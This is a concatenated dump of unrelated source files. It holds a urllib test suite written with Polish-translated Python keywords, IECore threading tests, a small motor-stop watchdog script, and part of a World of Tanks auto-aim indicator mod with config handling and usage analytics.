self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why they keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# they fail in one of the tests, sometimes in another. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# zaimportuj socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# spróbuj:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# dopóki cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# wyjąwszy socket.timeout:
# dalej
# w_końcu:
# serv.close()
# evt.set()
#
# klasa FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# zaimportuj ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNic(self):
# # global default timeout is ignored
# zaimportuj socket
# self.assertIsNic(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# spróbuj:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# w_końcu:
# socket.setdefaulttimeout(Nic)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# zaimportuj socket
# self.assertIsNic(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# spróbuj:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# w_końcu:
# socket.setdefaulttimeout(Nic)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
klasa RequestTests(unittest.TestCase):
"""Unit tests dla urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
klasa URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
dla path w list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
klasa PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
dla path w list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
jeżeli __name__ == '__main__':
unittest.main()
|
ThreadingTest.py
|
##########################################################################
#
# Copyright (c) 2010-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import time
import threading
import random
import os
import IECore
class ThreadingTest( unittest.TestCase ) :
def callSomeThings( self, things, args=(), kwArgs=(), threaded=False, iterations=1 ) :
for i in range( 0, iterations ) :
threads = []
for j in range( 0, len( things ) ) :
a = args[j] if args else ()
kwa = kwArgs[j] if kwArgs else {}
if threaded :
t = threading.Thread( target=things[j], args=a, kwargs=kwa )
t.start()
threads.append( t )
else :
things[j]( *a, **kwa )
for t in threads :
t.join()
def testThreadedOpGains( self ) :
## Checks that we actually get a speedup by running a bunch of slow
# C++ ops in parallel.
ops = []
kwArgs = []
for i in range( 0, 4 ) :
ops.append( IECore.PointDistributionOp() )
kwArgs.append( {
"mesh" : IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ),
"density" : 10000,
} )
tStart = time.time()
self.callSomeThings( ops, kwArgs=kwArgs, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( ops, kwArgs=kwArgs, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # may fail on single core machines or machines under varying load
def testThreadedReaders( self ) :
## Checks that we can read a bunch of files in parallel, even when one
# of the Readers is implemented in python. We're using the CachedReader
# here as it forces a call to Reader::create when the GIL isn't held yet.
args = [
( "test/IECore/data/exrFiles/ramp.exr", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/exrFiles/checkerAnimated.0006.exr", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/tiff/toTrace.tif", ),
( "test/IECore/data/tiff/toTraceThinned.tif", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/exrFiles/checkerAnimated.0006.exr", ),
( "test/IECore/data/exrFiles/checkerAnimated.0006.exr", ),
( "test/IECore/data/tiff/toTraceThinned.tif", ),
]
sp = IECore.SearchPath( "./", ":" )
calls = [ lambda f : IECore.CachedReader( sp, IECore.ObjectPool(1024 * 1024 * 10) ).read( f ) ] * len( args )
self.callSomeThings( calls, args, threaded=True )
def testMixedCPPAndPython( self ) :
## Checks that we can mix a bunch of C++ and python ops concurrently
# without crashing
ops = []
kwArgs = []
for i in range( 0, 4 ) :
ops.append( IECore.PointDistributionOp() )
kwArgs.append( {
"mesh" : IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ),
"density" : 10000,
} )
ops.append( IECore.ClassLsOp() )
kwArgs.append( { "type" : "op" } )
self.callSomeThings( ops, kwArgs=kwArgs, threaded=True, iterations=5 )
def testReadingGains( self ) :
## Checks that we can use a bunch of readers in different threads and
# that we get a speedup of some sort doing that.
args = [
( "test/IECore/data/exrFiles/ramp.exr", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/pdcFiles/particleMesh.pdc", ),
( "test/IECore/data/cobFiles/ball.cob", ),
( "test/IECore/data/jpg/21mm.jpg", ),
( "test/IECore/data/jpg/exif.jpg", ),
( "test/IECore/data/dpx/ramp.dpx", ),
]
calls = [ lambda f : IECore.Reader.create( f ).read() ] * len( args )
tStart = time.time()
self.callSomeThings( calls, args, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( calls, args, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def testWritingGains( self ) :
image = IECore.Reader.create( "test/IECore/data/jpg/21mm.jpg" ).read()
def write( o, f ) :
IECore.Writer.create( o, f ).write()
calls = []
for i in range( 0, 4 ) :
fileName = "test/IECore/test%d.jpg" % i
calls.append( IECore.curry( write, image, fileName ) )
tStart = time.time()
self.callSomeThings( calls, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( calls, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def testCachedReaderConcurrency( self ) :
args = [
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/idxFiles/test.idx", ),
( "test/IECore/data/cobFiles/intDataTen.cob", ),
( "test/IECore/data/cobFiles/intDataTen.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
( "test/IECore/data/cobFiles/pSphereShape1.cob", ),
]
cachedReader = IECore.CachedReader( IECore.SearchPath( "./", ":" ) )
calls = [ lambda f : cachedReader.read( f ) ] * len( args )
for i in range( 0, 5 ) :
cachedReader.clear()
self.callSomeThings( calls, args=args, threaded=True )
def testCachedReaderGains( self ) :
args = [
( "test/IECore/data/jpg/21mm.jpg", ),
( "test/IECore/data/jpg/exif.jpg", ),
( "test/IECore/data/jpg/greyscaleCheckerBoard.jpg", ),
( "test/IECore/data/dpx/ramp.dpx", ),
] * 4
cachedReader = IECore.CachedReader( IECore.SearchPath( "./", ":" ) )
calls = [ lambda f : cachedReader.read( f ) ] * len( args )
tStart = time.time()
cachedReader.clear()
self.callSomeThings( calls, args=args, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
cachedReader.clear()
self.callSomeThings( calls, args=args, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def testPythonColorConverterWithThread( self ) :
def NewSRGBToLinear( inputColorSpace, outputColorSpace ) :
converter = IECore.SRGBToLinearOp()
return converter
IECore.ColorSpaceTransformOp.registerConversion(
"newSRGB", "linear", NewSRGBToLinear
)
runThread = True
def test():
while runThread :
pass
newThread = threading.Thread(target=test)
newThread.start()
reader = IECore.Reader.create( "test/IECore/data/cinFiles/uvMap.512x256.cin" )
reader['colorSpace'] = 'newSRGB'
reader.read()
runThread = False
newThread.join()
def testInterpolatedCacheGains( self ) :
numObjects = 100
numAttrs = 2
def createCache( fileName ) :
data = IECore.V3fVectorData( [ IECore.V3f( 1 ) ] * 50000 )
cache = IECore.AttributeCache( fileName, IECore.IndexedIO.OpenMode.Write )
for i in range( 0, numObjects ) :
for j in range( 0, numAttrs ) :
cache.write( "object%d" % i, "attr%d" % j, data )
createCache( "test/IECore/interpolatedCache.0250.fio" )
createCache( "test/IECore/interpolatedCache.0500.fio" )
cache = IECore.InterpolatedCache(
"test/IECore/interpolatedCache.####.fio",
IECore.InterpolatedCache.Interpolation.Linear,
)
calls = []
for i in range( 0, 200 ) :
calls.append(
IECore.curry(
cache.read,
1.5,
"object%d" % random.uniform( 0, numObjects ),
"attr%d" % random.uniform( 0, numAttrs )
)
)
tStart = time.time()
self.callSomeThings( calls, threaded=False )
nonThreadedTime = time.time() - tStart
tStart = time.time()
self.callSomeThings( calls, threaded=True )
threadedTime = time.time() - tStart
self.failUnless( threadedTime < nonThreadedTime ) # this could plausibly fail due to varying load on the machine / io but generally shouldn't
def tearDown( self ) :
for f in [
"test/IECore/test0.jpg",
"test/IECore/test1.jpg",
"test/IECore/test2.jpg",
"test/IECore/test3.jpg",
"test/IECore/interpolatedCache.0250.fio",
"test/IECore/interpolatedCache.0500.fio",
] :
if os.path.exists( f ) :
os.remove( f )
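
# Illustrative sketch (not part of the original test file): the fan-out/join
# pattern used by callSomeThings() above, reduced to its core. `work_items` is
# a hypothetical list of (callable, args, kwargs) tuples; relies on the
# module-level `import threading`.
def _run_concurrently( work_items ) :
	threads = [ threading.Thread( target=fn, args=a, kwargs=kw ) for fn, a, kw in work_items ]
	for t in threads :
		t.start()
	for t in threads :
		t.join()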
if __name__ == "__main__":
unittest.main()
|
temp_var.py
|
import time
from threading import Thread  # used by the (currently commented-out) watchdog threads below

# NOTE: `tempvar` (the shared counter object) and `motor_stop()` are provided
# elsewhere in this project; this module only defines the auto-logoff and
# not-responding watchdog helpers that use them.
def auto_logoff():
while tempvar.count_time_logoff < 600:
tempvar.count_time_logoff += 1
print(tempvar.count_time_logoff)
time.sleep(1)
motor_stop()
return exit()
def notresponding():
while tempvar.count_time_stop_if_not_responding < 5:
tempvar.count_time_stop_if_not_responding += 1
print(tempvar.count_time_stop_if_not_responding)
time.sleep(1)
motor_stop()
# tt1 = Thread(target=auto_logoff)
# tt2 = Thread(target=notresponding)
# tt1.daemon = True
# tt2.daemon = True
# tt1.start()
# tt2.start()
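# --- Illustrative only: a minimal stand-in for the external dependencies ---
# The names mirror the attributes used above but are otherwise hypothetical;
# uncomment for standalone testing of this module.
#
# class _TempVar(object):
#     def __init__(self):
#         self.count_time_logoff = 0
#         self.count_time_stop_if_not_responding = 0
#
# tempvar = _TempVar()
#
# def motor_stop():
#     print("motor stopped")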
|
mod_autoaim_extended309.py
|
# -*- coding: utf-8 -*-
import os
import re
import json
import codecs
import datetime
import threading
import urllib
import urllib2
import math
import BigWorld
import GUI
import Vehicle
import Math
from constants import AUTH_REALM
from Avatar import PlayerAvatar
from AvatarInputHandler import cameras
from BattleReplay import BattleReplay
from gui.Scaleform.daapi.view.lobby.hangar.Hangar import Hangar
from tutorial.gui.Scaleform.battle import layout
from helpers import isPlayerAvatar
from gui.Scaleform.Battle import Battle
class Config(object):
def __init__(self):
self.enable = True
self.debug = False
self.ru = True if 'RU' in AUTH_REALM else False
self.version = 'v3.09(18.11.2015)'
self.author = 'by spoter'
self.description = 'autoaim_extended'
self.description_ru = 'Мод: "Индикатор'
self.author_ru = 'автор: spoter'
self.name = 'autoaim_extended'
self.description_analytics = 'Мод: "Индикатор'
self.tid = 'UA-57975916-6'
self.sys_mes = {}
self.setup = {'MODIFIER': {'MODIFIER_NONE': 0, 'MODIFIER_SHIFT': 1, 'MODIFIER_CTRL': 2, 'MODIFIER_ALT': 4}}
self._thread_analytics = None
self.analytics_started = False
self.language = None
self.xvm_installed = False
self.xvm_check()
self.res_mods = self.res_mods_init()
self.data = {}
self.default_config()
new_config = self.load_json(self.name, self.data)
self.data = new_config
if 'Русский' in self.data['config'].get('language'): self.ru = True
if self.ru:
self.description = self.description_ru
self.author = self.author_ru
@staticmethod
def res_mods_init():
wd = os.path.dirname(os.path.realpath(__file__))
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
wd = wd[0:wd.rfind('\\')]
return wd
def xvm_check(self):
try:
#
import xvm_main
self.xvm_installed = True
except StandardError:
pass
def default_config(self):
self.data = {
'config': {
'enable': True, 'debug': False, 'color': 'wg_enemy', 'indicators': {'model': True, 'direction': True, 'box': True}, 'language': 'Русский'
}, 'language': {
'Русский': {
}, 'English': {
}
}
}
def do_config(self):
self.enable = self.data['config'].get('enable', False)
self.debug = self.data['config'].get('debug', False)
if self.data['config'].get('language') in self.data['language']:
self.language = self.data['language'].get(self.data['config'].get('language'))
else:
self.data['config']['language'] = 'English'
self.language = self.data['language'].get('English')
def byte_ify(self, inputs):
if inputs:
if isinstance(inputs, dict):
return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
elif isinstance(inputs, list):
return [self.byte_ify(element) for element in inputs]
elif isinstance(inputs, unicode):
return inputs.encode('utf-8')
else:
return inputs
return inputs
@staticmethod
def json_comments(text):
regex = r'\s*(#|\/{2}).*$'
regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
lines = text.split('\n')
excluded = []
for index, line in enumerate(lines):
if re.search(regex, line):
if re.search(r'^' + regex, line, re.IGNORECASE):
excluded.append(lines[index])
elif re.search(regex_inline, line):
lines[index] = re.sub(regex_inline, r'\1', line)
for line in excluded:
lines.remove(line)
return '\n'.join(lines)
def load_json(self, name, config_old, save=False):
config_new = config_old
path = './res_mods/configs/spoter_mods/%s/' % self.name
if not os.path.exists(path):
os.makedirs(path)
new_path = '%s%s.json' % (path, name)
if save:
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
else:
if os.path.isfile(new_path):
try:
with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
data = self.json_comments(json_file.read().decode('utf-8-sig'))
config_new = self.byte_ify(json.loads(data))
json_file.close()
except Exception as e:
self.sys_mess()
print '%s%s' % (self.sys_mes['ERROR'], e)
else:
self.sys_mess()
print '%s[%s, %s %s]' % (self.sys_mes['ERROR'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG'])
with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
json_file.write('%s' % self.byte_ify(data))
json_file.close()
config_new = config_old
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_RECREATE_CONFIG_DONE'])
return config_new
@staticmethod
def code_pa(text):
try:
return text.encode('windows-1251')
except StandardError:
return text
def debugs(self, text):
if self.debug:
try:
text = text.encode('windows-1251')
except StandardError:
pass
print '%s%s [%s]: %s' % (datetime.datetime.now(), self.sys_mes['DEBUG'], self.code_pa(self.description), text)
def analytics_do(self):
if not self.analytics_started:
player = BigWorld.player()
param = urllib.urlencode({
'v': 1, # Version.
'tid': '%s' % self.tid, # Tracking ID / Property ID.
'cid': player.databaseID, # Anonymous Client ID.
't': 'screenview', # Screenview hit type.
'an': '%s' % self.description_analytics, # App name.
'av': '%s %s' % (self.description_analytics, self.version), # App version.
'cd': 'start [%s]' % AUTH_REALM # Screen name / content description.
})
self.debugs('http://www.google-analytics.com/collect?%s' % param)
urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
self.analytics_started = True
def analytics(self):
self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
self._thread_analytics.start()
def sys_mess(self):
self.sys_mes = {
'DEBUG': '[DEBUG]', 'LOAD_MOD': self.code_pa('[ЗАГРУЗКА]: ') if self.ru else '[LOAD_MOD]: ', 'INFO': self.code_pa('[ИНФО]: ') if self.ru else '[INFO]: ',
'ERROR': self.code_pa('[ОШИБКА]: ') if self.ru else '[ERROR]: ',
'MSG_RECREATE_CONFIG': self.code_pa('конфиг не найден, создаем заново') if self.ru else 'Config not found, recreating',
'MSG_RECREATE_CONFIG_DONE': self.code_pa('конфиг создан УСПЕШНО') if self.ru else 'Config recreating DONE',
'MSG_INIT': self.code_pa('применение настроек...') if self.ru else 'initialized ...', 'MSG_LANGUAGE_SET': self.code_pa('Выбран язык:') if self.ru else 'Language set to:',
'MSG_DISABLED': self.code_pa('отключен ...') if self.ru else 'disabled ...'
}
def load_mod(self):
self.do_config()
self.sys_mess()
print ''
print '%s[%s, %s]' % (self.sys_mes['LOAD_MOD'], self.code_pa(self.description), self.code_pa(self.author))
if self.enable:
self.debugs('Debug Activated ...')
print '%s[%s %s %s...]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.sys_mes['MSG_LANGUAGE_SET'], self.code_pa(self.data['config'].get('language')))
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_INIT'])
else:
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_DISABLED'])
print ''
class AutoAim(object):
def __init__(self):
self.autoaim_vehicle = None
self.view_edge_callback = None
self.view_direction_callback = None
self._box = None
self._model = None
self._model_blank = None
self._direction = None
self._create_config()
self._load_config()
def _create_config(self):
self.indicatorModel = True
self.indicatorEdge = False
self.indicatorDirection = True
self.indicatorBox = True
self._path = 'objects/autoaim_extended/'
self._box = None
self._box_tex = '%swg_enemy/box.dds' % self._path
self._model = None
self._model_tex = '%swg_enemy/marker.model' % self._path
self._model_blank = None
self._model_blank_text = '%sempty/marker.model' % self._path
self._direction = None
self.angle_autoaim = math.radians(1.28915504)
self._color = 'wg_enemy'
self._autoaim = (0.8588235294, 0.01568627451, 0, 1)
self._enemy = (1, 0, 0, 0.5)
self._friend = (0, 1, 0, 0.5)
self._flag = (1, 1, 1, 1)
self._autoaim_def = (0.2, 0.2, 0.2, 0.5)
self._enemy_def = (1, 0, 0, 0.5)
self._friend_def = (0, 1, 0, 0.5)
self._flag_def = (1, 1, 1, 1)
self._config = {'colors': {}}
self._config['colors']['blue'] = {'rgb': (0, 0, 255), 'edge': (0, 0, 1, 1), 'model': '%sblue/marker.model' % self._path, 'box': '%sblue/box.dds' % self._path}
self._config['colors']['brown'] = {
'rgb': (165, 42, 43), 'edge': (0.6470588235, 0.1647058824, 0.168627451, 1), 'model': '%sbrown/marker.model' % self._path, 'box': '%sbrown/box.dds' % self._path
}
self._config['colors']['chocolate'] = {
'rgb': (211, 105, 30), 'edge': (0.8274509804, 0.4117647059, 0.1176470588, 1), 'model': '%schocolate/marker.model' % self._path, 'box': '%schocolate/box.dds' % self._path
}
self._config['colors']['cornflower_blue'] = {
'rgb': (101, 149, 238), 'edge': (0.3960784314, 0.5843137255, 0.9333333333, 1), 'model': '%scornflower_blue/marker.model' % self._path, 'box': '%scornflower_blue/box.dds' % self._path
}
self._config['colors']['cream'] = {
'rgb': (252, 245, 200), 'edge': (0.9882352941, 0.9607843137, 0.7843137255, 1), 'model': '%scream/marker.model' % self._path, 'box': '%scream/box.dds' % self._path
}
self._config['colors']['cyan'] = {'rgb': (0, 255, 255), 'edge': (0, 1, 1, 1), 'model': '%scyan/marker.model' % self._path, 'box': '%scyan/box.dds' % self._path}
self._config['colors']['emerald'] = {
'rgb': (40, 240, 156), 'edge': (0.1568627451, 0.9411764706, 0.6117647059, 1), 'model': '%semerald/marker.model' % self._path, 'box': '%semerald/box.dds' % self._path
}
self._config['colors']['gold'] = {'rgb': (255, 215, 0), 'edge': (1, 0.8431372549, 0, 1), 'model': '%sgold/marker.model' % self._path, 'box': '%sgold/box.dds' % self._path}
self._config['colors']['green'] = {'rgb': (0, 128, 0), 'edge': (0, 0.5019607843, 0, 1), 'model': '%sgreen/marker.model' % self._path, 'box': '%sgreen/box.dds' % self._path}
self._config['colors']['green_yellow'] = {
'rgb': (173, 255, 46), 'edge': (0.6784313725, 1, 0.1803921569, 1), 'model': '%sgreen_yellow/marker.model' % self._path, 'box': '%sgreen_yellow/box.dds' % self._path
}
self._config['colors']['hot_pink'] = {
'rgb': (255, 105, 181), 'edge': (1, 0.4117647059, 0.7098039216, 1), 'model': '%shot_pink/marker.model' % self._path, 'box': '%shot_pink/box.dds' % self._path
}
self._config['colors']['lime'] = {'rgb': (0, 255, 0), 'edge': (0, 1, 0, 1), 'model': '%slime/marker.model' % self._path, 'box': '%slime/box.dds' % self._path}
self._config['colors']['orange'] = {'rgb': (255, 165, 0), 'edge': (1, 0.6470588235, 0, 1), 'model': '%sorange/marker.model' % self._path, 'box': '%sorange/box.dds' % self._path}
self._config['colors']['pink'] = {'rgb': (255, 192, 203), 'edge': (1, 0.7529411765, 0.7960784314, 1), 'model': '%spink/marker.model' % self._path, 'box': '%spink/box.dds' % self._path}
self._config['colors']['purple'] = {'rgb': (128, 0, 128), 'edge': (0.5019607843, 0, 0.5019607843, 1), 'model': '%spurple/marker.model' % self._path, 'box': '%spurple/box.dds' % self._path}
self._config['colors']['red'] = {'rgb': (255, 0, 0), 'edge': (1, 0, 0, 1), 'model': '%sred/marker.model' % self._path, 'box': '%sred/box.dds' % self._path}
self._config['colors']['wg_blur'] = {
'rgb': (131, 120, 252), 'edge': (0.5137254902, 0.4705882353, 0.9882352941, 1), 'model': '%swg_blur/marker.model' % self._path, 'box': '%swg_blur/box.dds' % self._path
}
self._config['colors']['wg_enemy'] = {
'rgb': (219, 4, 0), 'edge': (0.8588235294, 0.01568627451, 0, 1), 'model': '%swg_enemy/marker.model' % self._path, 'box': '%swg_enemy/box.dds' % self._path
}
self._config['colors']['wg_friend'] = {
'rgb': (128, 214, 57), 'edge': (0.5019607843, 0.8392156863, 0.2235294118, 1), 'model': '%swg_friend/marker.model' % self._path, 'box': '%swg_friend/box.dds' % self._path
}
self._config['colors']['wg_squad'] = {
'rgb': (255, 224, 65), 'edge': (1, 0.8784313725, 0.2549019608, 1), 'model': '%swg_squad/marker.model' % self._path, 'box': '%swg_squad/box.dds' % self._path
}
self._config['colors']['yellow'] = {'rgb': (255, 255, 0), 'edge': (1, 1, 0, 1), 'model': '%syellow/marker.model' % self._path, 'box': '%syellow/box.dds' % self._path}
def _load_config(self):
self._color = config.data['config'].get('color', 'wg_enemy')
config_indicators = config.data['config'].get('indicators')
self.indicatorModel = config_indicators.get('model', True)
self.indicatorDirection = config_indicators.get('direction', True)
self.indicatorBox = config_indicators.get('box', True)
self._box_tex = self._config['colors'][self._color]['box']
self._model_tex = self._config['colors'][self._color]['model']
self._autoaim = self._config['colors'][self._color]['edge']
def find_autoaim_target(self):
        # Resolve the vehicle the client is currently auto-aiming at, if any.
        # The id is kept on PlayerAvatar as a name-mangled private attribute
        # (an assumption based on the stock Avatar code), so look it up defensively.
        auto_aim_vehicle = BigWorld.entities.get(getattr(BigWorld.player(), '_PlayerAvatar__autoAimVehID', None), None)
        config.debugs('find_autoaim_target %s' % auto_aim_vehicle)
if auto_aim_vehicle is None and BigWorld.target() is not None:
return BigWorld.target()
player = BigWorld.player()
vehicles = player.arena.vehicles
camera_dir, camera_pos = cameras.getWorldRayAndPoint(0, 0)
camera_dir.normalise()
result_len = None
las_vehicle = None
min_radian = 100000.0
for vId, vData in vehicles.items():
if vData['team'] == player.team:
continue
vehicle = BigWorld.entity(vId)
if vehicle is None or not vehicle.isStarted or not vehicle.isAlive():
continue
            temp1, radian = self._calc_radian(vehicle.position, self.angle_autoaim)  # 1.289 degrees, expressed in radians
if not temp1 and temp1 is not None:
continue
length = self._calc_length(vehicle.position, BigWorld.player().position)
if radian:
if result_len is None:
result_len = length
las_vehicle = vehicle
if radian < min_radian and result_len >= length:
min_radian = radian
las_vehicle = vehicle
result = las_vehicle
if result is not None:
if BigWorld.wg_collideSegment(BigWorld.player().spaceID, BigWorld.entity(result.id).appearance.modelsDesc['gun']['model'].position, camera_pos, False) is None:
return result
return BigWorld.target()
@staticmethod
def _calc_length(start_position, end_position):
return (end_position - start_position).length
@staticmethod
    def _calc_radian(target_position, angle):
        # Returns (True, deviation) when the target lies within the given angular
        # threshold of the camera's view axis, (False, None) otherwise. The
        # deviation is 1 - cos^2(theta) = sin^2(theta), i.e. the squared sine of
        # the angle between the view direction and the direction to the target.
camera_dir, camera_pos = cameras.getWorldRayAndPoint(0, 0)
camera_dir.normalise()
camera_to_target = target_position - camera_pos
a = camera_to_target.dot(camera_dir)
if a < 0:
return False, None
target_radian = camera_to_target.lengthSquared
radian = 1.0 - a * a / target_radian
if radian > angle:
return False, None
return True, radian
@staticmethod
def get_battle_on():
try:
if BigWorld.player().arena: return True
except StandardError: return False
return hasattr(BigWorld.player(), 'arena')
@staticmethod
def get_is_live(vehicle_id):
try: return BigWorld.player().arena.vehicles[vehicle_id]['isAlive']
except StandardError: return False
def get_is_friendly(self, vehicle_id):
player = BigWorld.player()
